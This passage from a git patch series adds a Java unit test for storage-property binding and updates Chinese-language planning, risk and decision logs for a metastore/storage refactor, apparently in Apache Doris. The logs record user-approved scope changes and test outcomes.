FE startup; bindAllStorageProperties must + // delegate to its bindAll (the only place the runtime object-store directory plugins live). + FileSystemProperties bound = new FakeFsProps(); + FileSystemPluginManager mgr = new FileSystemPluginManager(); + mgr.registerProvider(supportingProvider(bound)); + FileSystemFactory.initPluginManager(mgr); + + List result = FileSystemFactory.bindAllStorageProperties(new HashMap<>()); + + Assertions.assertEquals(1, result.size()); + Assertions.assertSame(bound, result.get(0)); + } + + @Test + public void bindAllStorageProperties_fallsBackToServiceLoaderWhenNoManager() { + // Migration / unit-test path: no live manager -> ServiceLoader fallback (mirrors getFileSystem). + // No object-store binding provider is on fe-core's unit-test classpath, so the result is empty, + // but it must never be null or throw. + FileSystemFactory.clearProviderCache(); + List result = FileSystemFactory.bindAllStorageProperties(new HashMap<>()); + Assertions.assertNotNull(result); + } + + private static FileSystemProvider supportingProvider(FileSystemProperties bound) { + return new FileSystemProvider() { + @Override + public boolean supports(Map properties) { + return true; + } + + @Override + public FileSystemProperties bind(Map properties) { + return bound; + } + + @Override + public FileSystem create(Map properties) { + return null; + } + + @Override + public String name() { + return "fake"; + } + }; + } + + private static final class FakeFsProps implements FileSystemProperties { + @Override + public String providerName() { + return "FAKE"; + } + + @Override + public StorageKind kind() { + return null; + } + + @Override + public FileSystemType type() { + return null; + } + + @Override + public Map rawProperties() { + return Collections.emptyMap(); + } + + @Override + public Map matchedProperties() { + return Collections.emptyMap(); + } + } +} diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 7cc59ff7cc63b1..222d7a053d6c62 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -18,9 +18,10 @@ - 阶段:Research ✅ / Design ✅(**9 决策 D-001..D-009**)/ **Implement 🚧 进行中**。 - **范围已获批(2026-06-17 用户确认)= P0 + P1(storage 收口),做到 P1-T06 gate 停**。 - **P0-T01 ✅**(recon + 定向)→ **DV-001 / D-009**:缺 bind-all 入口,定机制 A(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +`FileSystemPluginManager.java`)。 -- **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,TDD 5 绿)| **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空 + fe-connector-spi→fe-filesystem-api 边,TDD 1 绿 + import-gate PASS)。 -- **下一个:P1-T02**(`DefaultConnectorContext.getStorageProperties()` 实现)——**⛔ 先 AskUserQuestion**:须经 `FileSystemFactory` static accessor 取 **live**(loadPlugins 过的)manager(fresh+loadBuiltins 无对象存储 provider)→ 第 3 个 fe-core 文件、白名单再 +1。 -- 代码 commit:P0-T01(plan-doc)+ P0-T02(bindAll)+ P1-T01(getStorageProperties 默认方法)。 +- **P0-T02 ✅**(`FileSystemPluginManager.bindAll`)| **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空 + 边)| **P1-T02 ✅**(`DefaultConnectorContext.getStorageProperties()` + `FileSystemFactory.bindAllStorageProperties`,D-009 二次确认 3 fe-core 文件全 additive,TDD 4 绿 + 2 回归绿)。 +- **fe-core/spi 侧管线已通**:getOrigProps→bindAll(live manager)→ConnectorContext.getStorageProperties()。 +- **下一个:P1-T03**(paimon `applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()` + 保留 `paimon.*/fs./dfs./hadoop.` 覆盖块;**含 T1 等价性测试**,R-001)。**这是连接器侧首个 task,性质不同,建议先与用户对齐 checkpoint。** +- 代码 commit:P0-T01(plan-doc)+ P0-T02 + P1-T01 + P1-T02。 ## 下一步(明确) 1. **等待用户批准 `tasks.md`(14 task,含 P3a)** 后进入 Implement。 diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index ae45a13f7872c6..0a074368009de6 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -10,16 +10,17 @@ |---|---|---| | Research(调研) | ██████████ 100% | ✅ 完成(8-agent + grep;+ 3-agent recon 复核 D-006/7/8) | | Design(设计) | ██████████ 100% | ✅ 完成(设计文档 + **7 决策** D-001..D-008,范围已收窄) | -| **Implement(实现)** | ███░░░░░░░ ~21% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 1/6) | +| **Implement(实现)** | ████░░░░░░ ~29% | 🚧 **进行中**(范围 P0+P1 已获批;P0 ✅;P1 2/6,fe-core/spi 侧管线全完成) | -任务计数:**3 / 14** 完成(P0: 2/2 ✅ | P1: 1/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 +任务计数:**4 / 14** 完成(P0: 2/2 ✅ | P1: 2/6 | P2: 0/5 | **P3a: 0/1**)| + **P3b**(全量去重 follow-up,范围外占位)。 --- ## 当前活跃 task -- **下一个:`P1-T02`**(`DefaultConnectorContext.getStorageProperties()` 实现)——**⛔ 先 AskUserQuestion**(见下 P1-T02 待解)。 -- P0-T01 ✅(recon + DV-001/D-009)| P0-T02 ✅(`FileSystemPluginManager.bindAll`)| P1-T01 ✅(`ConnectorContext.getStorageProperties()` 默认方法 + fe-connector-spi→fe-filesystem-api 边)。 -- ⚠️ **P1-T02 待解(gating)**:getStorageProperties 须用 **live**(已 loadPlugins 的)FileSystemPluginManager;该实例存于 `FileSystemFactory.pluginManager`(private、无 getter)→ 需在 `FileSystemFactory` 加 static accessor = **第 3 个 fe-core 文件**(白名单再 +1)。P1-T02 前 AskUserQuestion 确认。 +- **下一个:`P1-T03`**(paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties()` 的 `toHadoopConfigurationMap()`,**含 T1 等价性测试**)。 +- P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|**P1-T02 ✅**(getStorageProperties 实现 + FileSystemFactory accessor,TDD 4 绿 + 2 回归绿)。 +- ✅ **fe-core/spi 侧管线已通**:fe-core 绑定下发(getOrigProps→bindAll→live manager)→ ConnectorContext.getStorageProperties() → 连接器(待 P1-T03 消费)。fe-core 改动 3 文件均 additive(DefaultConnectorContext + FileSystemPluginManager + FileSystemFactory)。 +- ▶ **下一阶段是连接器侧**(P1-T03/T04/T05 改 paimon + P1-T06 验证)——与 fe-core 侧不同性质,含 T1 等价性核心风险 R-001。 ## 阻塞 / 待决 - ✅ 范围已获批(2026-06-17)= **P0+P1(storage 收口),做到 P1-T06 gate 停**。 @@ -29,6 +30,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-17 **P1-T02 ✅**(`DefaultConnectorContext.getStorageProperties()` + `FileSystemFactory.bindAllStorageProperties`,D-009 二次确认 3 文件):TDD 4 绿(factory 委托/fallback + ctx 空/全量绑定捕获 raw map)+ 回归 2 绿;checkstyle 0;raw map 经 `getOrigProps()` 取。**fe-core 侧管线打通**。 - 2026-06-17 **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空列表 + `fe-connector-spi→fe-filesystem-api` pom 边):TDD(RED assertNotNull→GREEN 1/1)+ checkstyle 0 + import-gate PASS;新建首个 fe-connector-spi 测试。 - 2026-06-17 **P0-T02 ✅**(`FileSystemPluginManager.bindAll`,D-009):TDD(RED 5 错→GREEN 5 绿)+ checkstyle 0;纯新增 34 行不动既有方法。实证发现真对象存储 providers 是运行时目录插件(非 fe-core 单测 classpath)→ 删 real-S3 集成测试移交 P1-T06;并发现 P1-T02 须经 `FileSystemFactory` static accessor 取 live manager(第 3 fe-core 文件,待 AskUserQuestion)。 - 2026-06-17 **进入 Implement(范围 P0+P1 获批)**;**P0-T01 ✅**(4-agent recon 取证三套 StorageProperties + 连接器 seam):(1) F1 等价性=非阻塞(fe-filesystem 与 paimon 现 fe-property 路常见静态凭据键全等、为超集);(2) F2 可行性=阻塞(无 bind-all 入口,证伪白名单「唯一 fe-core 改动」)→ **DV-001**;用户定 **机制 A** → **D-009**(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +1)。已回写设计/WORKFLOW/decisions/risks/tasks。 diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md index f05ffdef299b49..1c8eef63e9983b 100644 --- a/plan-doc/metastore-storage-refactor/WORKFLOW.md +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -54,6 +54,7 @@ fe/fe-connector/fe-connector-paimon/** (改造) fe/fe-connector/fe-connector-spi/** (仅 ConnectorContext 新增方法) fe/fe-core/src/main/java/.../connector/DefaultConnectorContext.java (仅新增 getStorageProperties) fe/fe-core/src/main/java/.../fs/FileSystemPluginManager.java (仅新增 bindAll;D-009/DV-001) +fe/fe-core/src/main/java/.../fs/FileSystemFactory.java (仅新增 bindAllStorageProperties;D-009 二次确认) fe/fe-connector/pom.xml ; fe/pom.xml (仅新增模块声明) plan-doc/metastore-storage-refactor/** (本跟踪目录) ``` diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md index 0881ad299d4e6b..eb761a97ed4799 100644 --- a/plan-doc/metastore-storage-refactor/decisions-log.md +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -8,8 +8,9 @@ ## D-009 — bind-all 机制 + 白名单 +1(FileSystemPluginManager)(应对 DV-001) - **日期**:2026-06-17 | **决策者**:用户(应对 P0-T01 证伪 P0-1 预期) - **内容**:实现 `ConnectorContext.getStorageProperties()`(返回 fe-filesystem typed `StorageProperties`)所需的 raw map → `List` 绑定,落在 fe-core `FileSystemPluginManager` 新增 additive `public List bindAll(Map)`(镜像现有 `createFileSystem` 的 provider 循环,但用 `provider.bind(props)` 全量收集所有 `supports()` 命中者,而非首个命中 `create`)。`DefaultConnectorContext.getStorageProperties()` 调它;raw map 经现有 `storagePropertiesSupplier` 值的 `getOrigProps()` 取(fe-core `ConnectionProperties` 公有 getter),**不改构造点**(`PluginDrivenExternalCatalog` 零改动)。 -- **理由**:守 D-003「连接器只见 fe-filesystem-api」架构(否决 C「ctx 返回 Map」=放弃该目标边);bindAll 放 fe-core(非 fe-filesystem-spi 静态)契合设计 §2.1「fe-core 用 providers 全量绑定」且能见 directory 插件(否决 B)。fe-core 改动 = `DefaultConnectorContext` + `FileSystemPluginManager` 两文件、均纯新增。 -- **影响**:WORKFLOW §4.1 白名单 +`FileSystemPluginManager.java`(仅新增 bindAll);risks R-004 改「唯一」为「两处 fe-core 新增」;设计 §4 P0-1/P0-2 回写(+DV-001 脚注);tasks P0-T02/P1-T02。**fe-core 旧 storage 包仍零改动**(bindAll 用 fe-filesystem providers,不碰 `datasource.property.storage`)。 +- **理由**:守 D-003「连接器只见 fe-filesystem-api」架构(否决 C「ctx 返回 Map」=放弃该目标边);bindAll 放 fe-core(非 fe-filesystem-spi 静态)契合设计 §2.1「fe-core 用 providers 全量绑定」且能见 directory 插件(否决 B)。 +- **🔧 二次确认(2026-06-17,P0-T02 实证后)**:fe-core 改动从原估 **2 文件修正为 3 文件**(均纯新增)。实证:生产中对象存储 providers 是 `Env.loadPlugins(pluginRoot)` **目录插件**,只存于 **live** `FileSystemPluginManager`(藏于 `FileSystemFactory.pluginManager` private、无 getter);`DefaultConnectorContext` 无法直达(构造点 `PluginDrivenExternalCatalog` 被 R-004 禁)。→ 须在 `FileSystemFactory` 加 additive static `bindAllStorageProperties(Map)`(委托 live `pluginManager.bindAll`,else ServiceLoader fallback,镜像现有 `getFileSystem` 双路径)。**三文件** = `DefaultConnectorContext`(+getStorageProperties)+ `FileSystemPluginManager`(+bindAll)+ `FileSystemFactory`(+bindAllStorageProperties)。raw map 经 `storagePropertiesSupplier.get().values()` 任一 `getOrigProps()`(已核实 = 完整 catalog map)。用户 2026-06-17 二次确认接受。 +- **影响**:WORKFLOW §4.1 白名单 +`FileSystemPluginManager.java` +`FileSystemFactory.java`(均仅新增方法);risks R-004 改「唯一」为「**三处** fe-core 新增」;设计 §4 P0-1/P0-2 回写(+DV-001 脚注);tasks P0-T02/P1-T02。**fe-core 旧 storage 包仍零改动**(bindAll 用 fe-filesystem providers,不碰 `datasource.property.storage`)。 ## D-008 — Vended creds 边界:连接器只「抽取」,fe-core 单点「归一」 - **日期**:2026-06-17 | **决策者**:用户 diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md index 96e31f5e439462..6d3d6fae39c61c 100644 --- a/plan-doc/metastore-storage-refactor/risks.md +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -25,10 +25,10 @@ --- -## R-004 — fe-core 改动越界 | 状态:监控中(白名单 2026-06-17 +1,DV-001/D-009) -- **描述**:本项目允许的 fe-core 改动**仅两处、均纯新增**:`DefaultConnectorContext`(+getStorageProperties)与 `FileSystemPluginManager`(+bindAll,D-009 应对 DV-001)。若实现时顺手碰了 `datasource.property.*` 包、`FileSystemPluginManager` 既有方法、或构造点 `PluginDrivenExternalCatalog` 即越红线。 -- **缓解**:每次提交前 `git diff --name-only` 对照 WORKFLOW §4.1 白名单;`git diff` 这两文件须只见**新增**(bindAll / getStorageProperties),无既有方法改动;验收 §6「零改动核对」。 -- **触发判据**:`git diff` 出现 fe-core property 包、其它连接器路径、或这两文件的非新增改动。 +## R-004 — fe-core 改动越界 | 状态:监控中(白名单 2026-06-17 +2,DV-001/D-009 二次确认) +- **描述**:本项目允许的 fe-core 改动**仅三处、均纯新增**:`DefaultConnectorContext`(+getStorageProperties)、`FileSystemPluginManager`(+bindAll)、`FileSystemFactory`(+bindAllStorageProperties,取 live manager;D-009 二次确认)。若实现时顺手碰了 `datasource.property.*` 包、这三文件的既有方法、或构造点 `PluginDrivenExternalCatalog` 即越红线。 +- **缓解**:每次提交前 `git diff --name-only` 对照 WORKFLOW §4.1 白名单;`git diff` 这三文件须只见**新增**方法,无既有方法改动;验收 §6「零改动核对」。 +- **触发判据**:`git diff` 出现 fe-core property 包、其它连接器路径、或这三文件的非新增改动。 ## R-005 — Kerberos 三处实现漂移(D-007)| 状态:监控中 - **描述**:kerberos 现有**三处实现**:fe-common `security.authentication.*`、fe-filesystem-hdfs 自抄 `KerberosHadoopAuthenticator`(约一年前拷贝、TGT 刷新逻辑可能已偏离)、paimon `PaimonCatalogFactory` 手抄 HMS kerberos HiveConf 键。改一处需同步三处,否则行为分叉。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 22386fd25511fc..220780d87091ba 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -33,11 +33,14 @@ - **依赖**:无。设计 §4 P1-1 / §3.2。**红线**:仅改 `ConnectorContext.java` + `fe-connector-spi/pom.xml`。 - **完成态**:`ConnectorContext` 加 `default List getStorageProperties() { return Collections.emptyList(); }`(fe-filesystem-api 类型,+25 行纯新增);pom 加 `fe-filesystem-api` 依赖(=「fe-connector 仅依赖 fe-filesystem-api」边落地)。新建首个测试 `ConnectorContextTest`(默认非空空列表)TDD(RED assertNotNull→GREEN 1/1)。checkstyle 0;`tools/check-connector-imports.sh` PASS(fe-filesystem-api 是纯叶子,无 fe-core/common/datasource 传递依赖)。其它连接器零影响(默认空)。 -### P1-T02 ⬜ DefaultConnectorContext.getStorageProperties() 实现 -- **做什么**(D-009):fe-core `DefaultConnectorContext` override `getStorageProperties()`:从现有 `storagePropertiesSupplier.get()` 取任一 fe-core typed 值的 `getOrigProps()`(= 完整 catalog raw map),喂 `FileSystemPluginManager.bindAll(rawMap)`(P0-T02)返回 fe-filesystem `List`。supplier 空(REST/vended、非 plugin ctor)→ 返回空列表(无静态 storage,正确)。**不改构造点。** -- **验收**:paimon catalog 下 `ctx.getStorageProperties()` 返回正确 typed 列表;hive/iceberg/其它连接器行为不变(默认空)。需确认 fe-core `createAll` 各实例 `origProps` = 完整 raw map(实现时读 `createAll`+ctor 核实)。 -- **依赖**:P1-T01, P0-T02。设计 §4 P1-2 / **D-009**。**红线**:fe-core 仅此文件新增 `getStorageProperties()`(bindAll 在 P0-T02 的 FileSystemPluginManager)。 -- **⚠️ 待解(P0-T02 发现,2026-06-17)**:生产中对象存储 providers 是 `Env.loadPlugins(pluginRoot)` **目录插件**(非 fe-core classpath built-in;fe-core pom 注「Phase 4 P4.1 移除 impl 运行时依赖」)。故 `getStorageProperties()` **必须**用那个**已加载插件的 live** `FileSystemPluginManager`(fresh `new+loadBuiltins` 无对象存储 provider→bindAll 空→paimon storage 失效)。但 live 实例存于 `FileSystemFactory.pluginManager`(private static、**无 getter**)。→ P1-T02 需在 `FileSystemFactory` 加 static accessor(如 `getPluginManager()` 或 `bindAllStorageProperties(map)` 委托),**即第 3 个 fe-core 文件**(白名单需再 +1)。实现 P1-T02 前 AskUserQuestion 确认。 +### P1-T02 ✅ DefaultConnectorContext.getStorageProperties() 实现(+ FileSystemFactory accessor)(2026-06-17,TDD 4 绿 + 2 回归绿 + checkstyle 0) +- **做什么**(D-009 二次确认): + 1. fe-core `FileSystemFactory` 加 additive static `bindAllStorageProperties(Map): List`:有 live `pluginManager`→`pluginManager.bindAll(map)`;否则 ServiceLoader fallback(镜像现有 `getFileSystem(Map)` 双路径)。 + 2. fe-core `DefaultConnectorContext` override `getStorageProperties()`:从现有 `storagePropertiesSupplier.get()` 取任一 fe-core typed 值的 `getOrigProps()`(= 完整 catalog raw map),喂 `FileSystemFactory.bindAllStorageProperties(rawMap)`。supplier 空(REST/vended、非 plugin ctor)→ 空列表(无静态 storage,正确)。**不改构造点。** +- **验收**:paimon catalog 下 `ctx.getStorageProperties()` 返回正确 typed 列表;hive/iceberg/其它连接器行为不变(默认空)。 +- **依赖**:P1-T01, P0-T02。设计 §4 P1-2 / **D-009**。**红线**:fe-core 仅 `DefaultConnectorContext`(+getStorageProperties)+ `FileSystemFactory`(+bindAllStorageProperties)两文件新增;bindAll 在 P0-T02 的 FileSystemPluginManager。 +- **✅ 已解(用户 2026-06-17 二次确认)**:`getStorageProperties()` 须用 live(loadPlugins 过的)manager,只能经 `FileSystemFactory` static accessor 取(构造点被禁)→ 白名单 +`FileSystemFactory.java`(D-009 二次确认)。`getOrigProps()` = 完整 raw map 已核实(`createAll(origProps)` 全量传入 + `ConnectionProperties` 整存)。 +- **完成态**:`FileSystemFactory.bindAllStorageProperties`(+32 纯新增,live manager 委托 / ServiceLoader fallback,镜像 getFileSystem)+ `DefaultConnectorContext.getStorageProperties`(+21 纯新增,getOrigProps→factory,空 supplier 短路)。TDD:4 新测试(factory 委托/fallback + ctx 空/全量绑定捕获 raw map)RED(stub UOE/NPE)→ GREEN 4/4;回归 `BackendStoragePropsTest` 2/2 + `FileSystemPluginManagerTest` 5/5 不变。checkstyle 0。3 fe-core 文件全 additive,无 property 包/构造点/其它连接器改动。 ### P1-T03 ⬜ PaimonCatalogFactory.applyStorageConfig 改走 toHadoopConfigurationMap - **做什么**:把 `fe-property StorageProperties.buildObjectStorageHadoopConfig(props)` 换成"遍历 `ctx.getStorageProperties()` 调 `toHadoopProperties().toHadoopConfigurationMap()`";**保留**其后的 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins)。 From 4d190a77020bf6fbe1b860708934666646b96ab4 Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 14:59:10 +0800 Subject: [PATCH 079/128] [P1-T03-prep] record DV-002: T1 = common-case equal + documented superset MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit User decision (mechanism A): accept fe-filesystem as the new storage source of truth. P0-T01 established fe-filesystem's Hadoop/BE maps are a SUPERSET of the fe-property path paimon uses today (S3 assume-role/anon keys; OSS/COS/OBS unconditional endpoint/region; BE map adds AWS_BUCKET/ROOT_PATH/ CREDENTIALS_PROVIDER_TYPE), so the design's literal "equal" T1 cannot hold. T1 is reframed: assert key/value equality on the common static-credential path (endpoint/region/AK/SK present, no role, no vended) per backend, and document the superset diffs as intentional/more-complete. Written back to design §5 T1, WORKFLOW §5.2 T1, deviations-log (DV-002). No code change. Co-Authored-By: Claude Opus 4.8 (1M context) --- ...tore-storage-property-refactor-design-2026-06-17.md | 2 +- plan-doc/metastore-storage-refactor/HANDOFF.md | 8 ++++++-- plan-doc/metastore-storage-refactor/WORKFLOW.md | 2 +- plan-doc/metastore-storage-refactor/deviations-log.md | 10 ++++++++++ 4 files changed, 18 insertions(+), 4 deletions(-) diff --git a/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md b/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md index 95c44948390055..97648142be5c56 100644 --- a/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md +++ b/plan-doc/designs/metastore-storage-property-refactor-design-2026-06-17.md @@ -325,7 +325,7 @@ hive/iceberg 后续迁移时复用同一批 provider/`*MetastoreBackend.parse` - **R3 打包/类加载**:HMS/DLF 活连接需 relocated thrift(`fe-connector-paimon-hive-shade`)build-order 在前 + child-first hadoop/aws bundling,重构模块时不可破坏(有历史 S3A/thrift 跨 loader cast bug)。 **测试(决策驱动,强制)** -- **T1 新旧等价性**:对 S3/OSS/COS/OBS/Azure/HDFS 代表输入,断言新 `toHadoopConfigurationMap()` / `toBackendProperties().toMap()` 与 fe-core 旧产物 key/value 全等(含默认调优值)。这是切换的回归闸(背景报告指出当前**缺**此测试)。 +- **T1 新旧等价性(DV-002 修订)**:对 S3/OSS/COS/OBS/HDFS 代表输入,断言新 `toHadoopConfigurationMap()` / `toBackendProperties().toMap()` 与 paimon 现走 fe-property 旧产物在**常见静态凭据路径**(配齐 endpoint/region/AK/SK,无 role、无 vended)下 key/value **全等**(含默认调优值分叉);fe-filesystem 的**超集差异**(S3 role/anon、OSS/COS/OBS endpoint 无条件、BE map 多 AWS_BUCKET/ROOT_PATH/CREDENTIALS_PROVIDER_TYPE)作**有意、更完整**记录,不视为漂移(用户 2026-06-17 定 A,认 fe-filesystem 为新事实源)。这是切换的回归闸(背景报告指出当前**缺**此测试)。 - **T2 metastore facts 等价性**:对 HMS(simple/kerberos)、DLF(endpoint-from-region)、REST、JDBC、filesystem,断言共享 `*MetastoreBackend.parse` 产出的中立 map 与 fe-core 旧 `Paimon*MetaStoreProperties` 一致(含 ParamRules 报错文案)。 - **T3 依赖图守门**:ArchUnit/CI gate 断言 `fe-connector-*` 不 import `org.apache.doris.{catalog,common,datasource,qe,...}`,且 Phase 1 后追加禁 `org.apache.doris.property`;`fe-filesystem-*` 不 import fe-core/fe-connector。 - **T4 端到端**:docker `enablePaimonTest=true` 跑 paimon 5 flavor(filesystem/hms/rest/jdbc/dlf)读 + vended(REST/DLF) + Kerberos HMS。 diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 222d7a053d6c62..59be3c5eff6f68 100644 --- a/plan-doc/metastore-storage-refactor/HANDOFF.md +++ b/plan-doc/metastore-storage-refactor/HANDOFF.md @@ -20,8 +20,12 @@ - **P0-T01 ✅**(recon + 定向)→ **DV-001 / D-009**:缺 bind-all 入口,定机制 A(fe-core `FileSystemPluginManager.bindAll` + `getStorageProperties()` 经 `getOrigProps()`,白名单 +`FileSystemPluginManager.java`)。 - **P0-T02 ✅**(`FileSystemPluginManager.bindAll`)| **P1-T01 ✅**(`ConnectorContext.getStorageProperties()` 默认空 + 边)| **P1-T02 ✅**(`DefaultConnectorContext.getStorageProperties()` + `FileSystemFactory.bindAllStorageProperties`,D-009 二次确认 3 fe-core 文件全 additive,TDD 4 绿 + 2 回归绿)。 - **fe-core/spi 侧管线已通**:getOrigProps→bindAll(live manager)→ConnectorContext.getStorageProperties()。 -- **下一个:P1-T03**(paimon `applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()` + 保留 `paimon.*/fs./dfs./hadoop.` 覆盖块;**含 T1 等价性测试**,R-001)。**这是连接器侧首个 task,性质不同,建议先与用户对齐 checkpoint。** -- 代码 commit:P0-T01(plan-doc)+ P0-T02 + P1-T01 + P1-T02。 +- **下一个:P1-T03**(连接器侧首个 task)。T1 框架已定 **A(DV-002)**:认 fe-filesystem 新事实源,T1 = 常见静态凭据路径全等 + 文档记超集。实现要点: + 1. paimon `PaimonCatalogFactory.applyStorageConfig` 改走 `ctx.getStorageProperties()` 的 `toHadoopProperties().toHadoopConfigurationMap()`(取代 `fe-property StorageProperties.buildObjectStorageHadoopConfig`),**保留**其后 `paimon.*/fs./dfs./hadoop.` 覆盖块(保序 last-write-wins)。 + 2. **先 recon**:`PaimonCatalogFactory` 是纯静态 util(无 ctx),`applyStorageConfig` 3 调用方(buildHadoopConfiguration/buildHmsHiveConf/buildDlfHiveConf);须找到连接器调 factory 处 ctx/storageList 从哪来,把 `List` 线程进去(签名重构)。 + 3. T1 等价性测试:fe-filesystem 产物 vs fe-property 现产物,常见路径全等 + 注释超集(R-001 闸)。 + 4. 编译/测 paimon 模块需 `-am package -Dassembly.skipAssembly=true`(shade jar 带 HiveConf)。 +- 代码 commit:P0-T01(plan-doc)+ P0-T02 + P1-T01 + P1-T02 + DV-002 决策记录。 ## 下一步(明确) 1. **等待用户批准 `tasks.md`(14 task,含 P3a)** 后进入 Implement。 diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md index 1c8eef63e9983b..911ed82e7e6c39 100644 --- a/plan-doc/metastore-storage-refactor/WORKFLOW.md +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -87,7 +87,7 @@ plan-doc/metastore-storage-refactor/** (本跟踪目录) - 后台 task 的退出码以输出里的 `BUILD SUCCESS/FAILURE` 行为准(非 echo 的 exit code)。 ### 5.2 阶段验收测试(强制,设计文档 §5) -- **T1**(P1):S3/OSS/COS/OBS/HDFS 代表输入下,新 `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 与 fe-core 旧 `getHadoopStorageConfig()`/`getBackendConfigProperties()` 的 key/value **全等**(含默认调优值分叉 S3=50/3000/1000 vs OSS/COS/OBS=100/10000/10000)。 +- **T1**(P1,**DV-002 修订**):S3/OSS/COS/OBS/HDFS 代表输入下,新 `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 与 paimon 现走 fe-property 旧产物在**常见静态凭据路径**(配齐 endpoint/region/AK/SK,无 role/无 vended)下 key/value **全等**(含默认调优值分叉 S3=50/3000/1000 vs OSS/COS/OBS=100/10000/10000);fe-filesystem 超集差异(S3 role/anon、endpoint 无条件、BE 多 AWS_BUCKET/ROOT_PATH/CREDENTIALS_PROVIDER_TYPE)作有意记录,非漂移。 - **T2**(P2):HMS(simple/kerberos)/DLF/REST/JDBC/filesystem 下,共享 `*MetastoreBackend.parse` 产物与 fe-core 旧 `Paimon*MetaStoreProperties` 一致(HiveConf key 集 + ParamRules 报错文案)。 - **T3**:依赖图守门(CI gate + 可加 ArchUnit)。 - **T4**:docker `enablePaimonTest=true` 跑 paimon 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS。 diff --git a/plan-doc/metastore-storage-refactor/deviations-log.md b/plan-doc/metastore-storage-refactor/deviations-log.md index 6c76896f598f28..61aef795761e68 100644 --- a/plan-doc/metastore-storage-refactor/deviations-log.md +++ b/plan-doc/metastore-storage-refactor/deviations-log.md @@ -6,6 +6,16 @@ --- +## DV-002 — T1 等价性从「全等」放宽为「常见静态凭据路径全等 + 文档记超集」 +- **日期**:2026-06-17 | **原计划位置**:设计 §5 T1 / §6.4 验收 item 4 / WORKFLOW §5.2 T1("新 == 旧 key/value **全等**")。 +- **为何不可行(P0-T01 取证)**:fe-filesystem `toHadoopConfigurationMap()`/`toBackendProperties().toMap()` 是 paimon 现走 fe-property 路(`buildObjectStorageHadoopConfig`)的**超集**,非全等: + - **S3**:fe-filesystem 加 assume-role 分支(`fs.s3a.assumed.role.*`)+ 无 AK 时 anonymous/default `fs.s3a.aws.credentials.provider`;fe-property base 二者皆无。 + - **OSS/COS/OBS**:配置齐时一致(jindo/cosn/obs 块都在),但 fe-filesystem `fs.s3a.endpoint`/`.region` **无条件**发(`cfg.put`)vs fe-property **懒发**(仅非空时)。 + - **BE map**:fe-filesystem `toMap()` 多 `AWS_BUCKET`/`AWS_ROOT_PATH`/`AWS_CREDENTIALS_PROVIDER_TYPE`。 + - 均为 fe-filesystem 更完整的**有意设计**,非 bug。故字面「全等」测试必红。 +- **新方案(用户 2026-06-17 定 A)**:认 fe-filesystem 为**新事实源**。**T1 = 常见静态凭据路径**(S3/OSS/COS/OBS 配齐 endpoint/region/AK/SK,无 role、无 vended)下各后端 key/value **全等**(含调优默认分叉 S3=50/3000/1000 vs 其它 100/10000/10000)+ **文档明记超集差异为「有意、更完整」**。P1-T03/T04 全量切换 fe-filesystem(含 P1-T04 BE 凭据也切 `toBackendProperties().toMap()`)。 +- **影响**:设计 §5 T1 / §6.4 / WORKFLOW §5.2 T1 加(DV-002 修订)脚注;risks R-001 缓解更新;P1-T03/T04 的 T1 测试钉常见路径全等 + 注释超集(对照 fe-property 现产物)。 + ## DV-001 — P0-1 预期「fe-filesystem-api 已够用、无需门面」被证伪:缺 raw map → List 的 bind-all 入口 - **日期**:2026-06-17 | **原计划位置**:设计 §4 P0-1 / §2.1 / 决策 D-003;task P0-T01;WORKFLOW §4.1 路径白名单("唯一 fe-core 改动 = DefaultConnectorContext")。 - **为何不可行(取证)**: From 550c7d1c86b6897990a595c6d1b89f0b75d894e4 Mon Sep 17 00:00:00 2001 From: morningman Date: Wed, 17 Jun 2026 18:34:57 +0800 Subject: [PATCH 080/128] 